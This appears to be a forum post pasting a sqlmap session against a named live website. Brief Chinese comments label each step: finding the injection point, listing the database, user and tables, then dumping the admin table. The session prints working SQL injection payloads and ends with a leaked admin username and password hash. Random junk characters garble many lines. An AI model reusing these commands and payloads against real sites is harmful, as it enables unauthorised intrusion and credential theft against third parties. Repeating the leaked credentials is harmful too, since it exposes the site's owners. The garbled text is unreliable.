D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" C( o# S( ~% H; ~0 @. C8 U0 ^# R1 ^
ms "Mysql" --current-user /* 注解:获取当前用户名称
* F& @0 o3 q8 R; h: r) C: X6 n: u sqlmap/0.9 - automatic SQL injection and database takeover tool% v$ d% {: p/ y2 @
http://sqlmap.sourceforge.net starting at: 16:53:549 w/ r8 w. Z9 n8 W: N% k& f/ I8 x6 Q
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 Z( U! @& \. d: C! p- {
session file: S1 x4 J& m# N5 V4 p
[16:53:54] [INFO] resuming injection data from session file
, g6 m7 @/ M" ][16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 k, J# Z0 L, l# O; s
[16:53:54] [INFO] testing connection to the target url
2 r9 q9 ~* Y3 n& U) ~/ _sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ r B! g4 R t' k8 j* `1 k" [sts:
% l4 c: ^5 v- D8 e1 D& P2 u---
' |, X5 y' E+ d4 M7 `Place: GET. l Y. r3 v9 H" \; c
Parameter: id
9 C. K4 K. D$ I% Q% w Type: boolean-based blind
! m& Q9 } U7 y1 l% `, J# z Title: AND boolean-based blind - WHERE or HAVING clause+ a, f3 ]; Q+ F- ]6 j* L; a8 |! u
Payload: id=276 AND 799=799
9 u* g' }" S# w Type: error-based+ D( c) O8 C A1 h, j
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 y7 e9 Y ]- z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 e; D7 X$ F0 t9 e. @+ T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 A) E. X, b. I8 Q5 s8 E
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" }6 X0 e! ?& W h- y# Z Type: UNION query" C! S |* e+ N w/ l
Title: MySQL UNION query (NULL) - 1 to 10 columns$ t/ @+ U; _- ]( P4 j, O& a
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. U( {+ x# }" p/ x$ G5 l6 c0 ~9 A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' V4 a, K% E9 [* I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% n0 C' w+ U' m& g8 U. ? Type: AND/OR time-based blind" ~& e( S6 w) H" c7 L0 o* i
Title: MySQL > 5.0.11 AND time-based blind
0 x$ ]5 ~2 i3 J* r Payload: id=276 AND SLEEP(5)
9 ]2 ]* W; u6 Y, I6 u5 K% `3 i4 D---
$ T3 C, C" \- S4 _3 {0 c7 `[16:53:55] [INFO] the back-end DBMS is MySQL
# U9 _0 o% W( {( O+ V' H U* yweb server operating system: Windows" [, t- S% O" y9 n( A
web application technology: Apache 2.2.11, PHP 5.3.0
9 K- n& `$ w% h6 h# _4 Hback-end DBMS: MySQL 5.0
% i7 X' i4 P% {[16:53:55] [INFO] fetching current user0 j8 J' f7 i9 k1 I7 L
current user: 'root@localhost' : E6 c5 C9 c0 u3 L; ]. w
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
4 J# g) ?: o( q* [; ytput\www.wepost.com.hk' shutting down at: 16:53:58
7 X% E# D: U: g# P/ O; `7 _$ m, y1 ]7 k, _3 S, B
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' l2 t( j4 G" }# i% ]- Z( |/ m% |ms "Mysql" --current-db /*当前数据库: ~" j: t$ u- j
sqlmap/0.9 - automatic SQL injection and database takeover tool
5 |2 P9 T, @1 L3 L% k0 h8 A http://sqlmap.sourceforge.net starting at: 16:54:16
9 d. S. ~/ o% K0 y% f+ e. e! u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
# p1 [4 e4 d) ^: k session file
1 |' x+ x, a6 K; j# i0 g" b9 s[16:54:16] [INFO] resuming injection data from session file
& Z' y. A. q( M5 r/ J$ @[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ O- q! Q6 T S/ G; f- E7 Z
[16:54:16] [INFO] testing connection to the target url
4 M' y0 D; p# I6 M& S# O' ssqlmap identified the following injection points with a total of 0 HTTP(s) reque4 }1 b( ?4 ^" Q# K& G8 M, D5 r
sts:' n! t% Z3 V& x) |' D
---- H5 k6 V- D) Z7 H
Place: GET4 p: t( k( a: x3 b% f
Parameter: id/ \8 T) n! ^6 O, c! m9 p3 m
Type: boolean-based blind4 e6 ` t- C) M0 W1 x9 i
Title: AND boolean-based blind - WHERE or HAVING clause4 o3 Y; C' c. Y8 i# }' w: D
Payload: id=276 AND 799=7999 ~2 T2 d1 j! W, W
Type: error-based) f& L" p# p! W. _5 A6 y0 P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 t! N% f; a5 F+ @$ B) l2 { Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 \7 f, j& l8 @ w: i0 S8 v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 |( h; ~% }4 b/ c$ h" d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ C3 A" e" v. Y; W
Type: UNION query% b8 z2 f5 @: i
Title: MySQL UNION query (NULL) - 1 to 10 columns( Y [! U* f" Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 L! u# N* v) o' r& `1 N5 H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
' S: Y& w3 {4 D: UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 }. F" Z% ]2 j" l* J* G( d- [ Type: AND/OR time-based blind
" }; o2 u8 O. ?% B% R- \ Title: MySQL > 5.0.11 AND time-based blind
2 M8 z0 n' U% \* A7 p) d: o Payload: id=276 AND SLEEP(5)2 t; [2 X4 g& e% w5 V
--- I2 z# ^! ]& Y; r; ]
[16:54:17] [INFO] the back-end DBMS is MySQL, E8 T2 l! U# J+ p9 w2 K* d7 u
web server operating system: Windows1 X: m. j% g! T6 c# v1 f( O: v0 @
web application technology: Apache 2.2.11, PHP 5.3.0
! y( Y$ N- Q! d7 k6 D( D6 ?- M6 iback-end DBMS: MySQL 5.0; B8 x4 ]' c% ~, U/ J- o+ A
[16:54:17] [INFO] fetching current database1 S( X8 R8 p @: m1 ^
current database: 'wepost'
* ?9 q& E) |1 D5 t$ g& R7 r[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
7 A6 ^9 c3 c0 V' @; e" T" vtput\www.wepost.com.hk' shutting down at: 16:54:18. U5 ?- q% z$ W, E- R g3 b, R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
I1 ]: E$ d3 j. x* A* @ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名8 O2 V5 t7 Y) q
sqlmap/0.9 - automatic SQL injection and database takeover tool2 F: f& p) ?9 z0 m- ~7 a, ?
http://sqlmap.sourceforge.net starting at: 16:55:254 Z: m& `- E) [0 U
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( L5 \& w$ z" l5 Y' R) `2 {& j session file6 r' \/ g5 O. {' |4 i2 |, @. f! c
[16:55:25] [INFO] resuming injection data from session file
* l+ c2 `2 c. v8 Q: O[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: ]- K; }: {' T# J. N[16:55:25] [INFO] testing connection to the target url' A$ q' i5 r: I% M) D* M; H7 ]: w, z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( X2 k Y. o% U3 E! Ests:- d" z" b! X, _+ R8 ~
---1 f- A. M6 |2 ~7 _' S$ p7 ?) H
Place: GET# s- D6 D$ ]& T3 H
Parameter: id" p' C3 @4 |* s/ R' X$ E5 V2 v
Type: boolean-based blind8 U2 S; r2 u. x5 i
Title: AND boolean-based blind - WHERE or HAVING clause
+ w. ^7 X' h4 q& C1 G9 E Payload: id=276 AND 799=799( I9 N& b" ]8 [1 c, F3 X$ S& x6 a
Type: error-based
' P$ U/ R* n0 n! N. s Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ V9 Y7 W, Q" z1 P* }% s" m2 n* v! C5 C
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- f+ c! z5 T0 w4 R9 r120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 x5 T. t7 j3 N$ L" G; C' s),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) ^" B2 l4 O# L p C
Type: UNION query+ Z% }5 Z0 J7 L/ l8 F/ v, E$ S
Title: MySQL UNION query (NULL) - 1 to 10 columns+ ?7 h% p' J7 n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR! Q2 A( E$ a, ?: f, S
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 V- e4 O% Q/ ^: p- \- \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) f+ h0 B" n3 Z4 ]- h1 T Type: AND/OR time-based blind# r% M4 l9 V4 h7 n" ~+ D
Title: MySQL > 5.0.11 AND time-based blind, F. R( G# J2 }. Q+ A, W" {9 w( m
Payload: id=276 AND SLEEP(5): J/ z; [% C1 d& o
---$ S* A) z& ~2 S" n( r C" t S) A! s
[16:55:26] [INFO] the back-end DBMS is MySQL
( s$ f/ J2 w1 ~web server operating system: Windows
) k1 O' j) z- ^5 ?3 |8 f6 Oweb application technology: Apache 2.2.11, PHP 5.3.0
& v6 y+ l7 d, { o/ _/ Mback-end DBMS: MySQL 5.0) E; M! \. F- i: q0 U; e4 e
[16:55:26] [INFO] fetching tables for database 'wepost'
H- f3 l7 F6 b; V[16:55:27] [INFO] the SQL query used returns 6 entries
! h% G& o$ n; z) `! y0 f3 XDatabase: wepost% ~4 k0 [' M# z \2 ]1 C
[6 tables]
- } J& r9 t" H" r! f3 ~; Q* a+-------------+
W, A/ o' `) z) _| admin |
, X$ Q' w6 u" E' L% o| article |. j7 o9 j9 x0 W3 U
| contributor |
8 t0 x2 i: F4 v I& M| idea |3 f- j4 z1 t+ W: m- R$ l
| image |) ?+ E: |0 z5 b4 P, S" ]: ~' x
| issue |0 f) |2 p0 y- r7 Y! @
+-------------+
+ L/ {# H8 }; n1 n* k q[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 i& @4 z/ G6 k2 Vtput\www.wepost.com.hk' shutting down at: 16:55:33$ H; I7 e' l3 `* L3 {
0 i( N; x+ v! C2 M( [2 _$ X: `
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 X4 A m8 j8 y0 g, H
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名; E! s# W' U- F+ l; F6 O; N
sqlmap/0.9 - automatic SQL injection and database takeover tool
, ~; E# o: w( }$ O& d9 n9 i5 a+ m http://sqlmap.sourceforge.net starting at: 16:56:06
) y9 \! s K1 B9 u- k- \4 ~) [sqlmap identified the following injection points with a total of 0 HTTP(s) reque; T/ s) Y7 j8 \# Z2 r
sts:
! {5 @8 h$ c4 i- p9 t" U---$ F: y6 A: d, t4 A
Place: GET* v ?. T3 E2 ^ Y8 I, z5 [
Parameter: id+ E% a" E) k$ s" s. d; }
Type: boolean-based blind
; ^. D/ b: q4 s4 U& N Title: AND boolean-based blind - WHERE or HAVING clause5 d' ?- K! E0 j! }, o5 g1 j6 n: s
Payload: id=276 AND 799=799
) W9 w! S; I' T" l+ @ Type: error-based
1 v7 A* p- X9 e* x6 y- O* Z7 z Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 S- c8 @' P- f% H$ H5 V) Y' T
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ M: m1 y$ X: G/ y& O! ?9 ^( @% g* L6 B
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) D. V& Y8 r( t- O9 k) l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& ?0 O! W9 p9 Q& M Type: UNION query R& j) g$ K2 T# X8 W, w
Title: MySQL UNION query (NULL) - 1 to 10 columns/ v) }' ~ ^6 A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ K' ~4 O: |! ^3 z/ D& f5 O2 i' c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ G! o$ Q0 a$ t3 b. J$ \! |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' B% H& E4 } s: I' K, { Type: AND/OR time-based blind* [7 X; u! K+ D% G8 C& e
Title: MySQL > 5.0.11 AND time-based blind: P7 @* J+ t5 A7 U _
Payload: id=276 AND SLEEP(5)/ j* I# q3 Z) n* S8 ]
---1 e8 q: C, \6 e% J' ?
web server operating system: Windows' E- j2 T$ ]+ J
web application technology: Apache 2.2.11, PHP 5.3.0# x. z$ {3 R4 Q& W2 a* }7 v2 g
back-end DBMS: MySQL 5.0; @& |' X, t" P
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
/ N q3 V2 Q9 L* r. {8 S5 wssion': wepost, wepost
6 v- L* f% Y( C* R% a: \" rDatabase: wepost
, c% O3 @ q; |Table: admin
* Q/ Q/ y* O9 F: B; u[4 columns]" U: I/ B. G7 ?5 K1 ^/ V( I5 T
+----------+-------------+
4 w8 _. U( |2 T9 W% `| Column | Type |
3 w% K7 R) X; B! c2 Y+----------+-------------+7 ]. n/ [3 y. I: _
| id | int(11) |! N: @- l6 c3 _: p5 u
| password | varchar(32) |4 p. ^7 u/ I& J! w+ ^
| type | varchar(10) |
8 H2 d: R G4 `' N8 _# `- J4 Y2 r# B| userid | varchar(20) |
2 @" W, X3 V6 |! l/ ^/ s9 D+----------+-------------+, f0 h1 H4 p5 T$ p: }, D
shutting down at: 16:56:198 u g7 T/ ?2 d2 d7 o& E) w
# z3 N6 |/ o6 E8 rD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 M) l: U4 s1 Z0 R7 m1 rms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容! V- e. n" v" E" \# X* E
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 D0 r8 {: T4 y* x http://sqlmap.sourceforge.net starting at: 16:57:14
# e5 ^6 p& @5 x4 {0 A; B3 Ssqlmap identified the following injection points with a total of 0 HTTP(s) reque* T+ g2 f! f3 _9 ` [( O, `
sts:. X+ N7 f1 V; _0 ^
---
" w2 R6 L; J; ~- ~$ zPlace: GET
, q+ G/ F) o! n2 i+ o; {5 r, |6 g8 aParameter: id
" M7 o1 r) e$ }! k- P0 _# S Type: boolean-based blind& M6 E5 |/ ]2 d9 T* X% C6 K
Title: AND boolean-based blind - WHERE or HAVING clause
# x5 L" B+ Z# M% U* y Payload: id=276 AND 799=799
) r& f0 U6 l8 Z$ d. @* V Type: error-based
5 n1 n- K l d5 W" n' l* r Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- L( x8 G3 C: o, Y2 O- g; f& ? Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 |2 a) @) g* Y$ Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 j* X: ]4 q9 h6 l0 D- ~3 l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ Z/ W. Q. R3 `* Y9 V% a; z: a Type: UNION query$ C" w$ V4 d' @7 ?7 N" n( P
Title: MySQL UNION query (NULL) - 1 to 10 columns- \+ \& \ h: T! Z% U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ t% ^: i. z$ o( j k1 S(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* b7 U7 G* i. q( D6 a5 \; n, ^- f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 @8 ?9 c I+ n# [4 V9 e9 n' M Type: AND/OR time-based blind
0 L1 e9 z: B4 S' Q; Y9 y" A4 x w! B' I. N Title: MySQL > 5.0.11 AND time-based blind
' l" D$ ?7 b) Q8 ~" X1 ? Payload: id=276 AND SLEEP(5)
3 Y& s, ?, q- H; T, L4 i---* J/ E# i8 m) b7 @- {) N2 p( t
web server operating system: Windows8 A6 @" L' E+ ?7 ?+ k
web application technology: Apache 2.2.11, PHP 5.3.01 B* P* ^' d; @( T
back-end DBMS: MySQL 5.0
. H! K1 N E; b+ N9 }/ v' Trecognized possible password hash values. do you want to use dictionary attack o( Z1 d% f6 U- G8 Q, H
n retrieved table items? [Y/n/q] y
' M5 `8 q/ l3 z6 l# e) [# b7 z( ~what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]. ]/ f# x- ^, F3 t3 Y7 u
do you want to use common password suffixes? (slow!) [y/N] y6 ?) q5 K( |1 D
Database: wepost/ i( h' |& g6 t! s; j( s0 g
Table: admin
9 e8 `; h G6 Q6 S( I0 ^[1 entry]
2 z: ?2 V$ _5 B; |( w; ^+----------------------------------+------------+
1 ~1 `! S$ I' y* x" n0 v0 n# S| password | userid |7 z, t* u0 M$ F' |0 e! q" V
+----------------------------------+------------+: k2 g+ |+ q. l0 {
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
r9 D2 L5 w' A( D7 O# O/ G+----------------------------------+------------+7 `3 Z5 M: s" V
shutting down at: 16:58:14
L& D( p1 o* T. n) Z1 ?) `1 O6 g& D& _% O1 H& _% m# p4 t
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对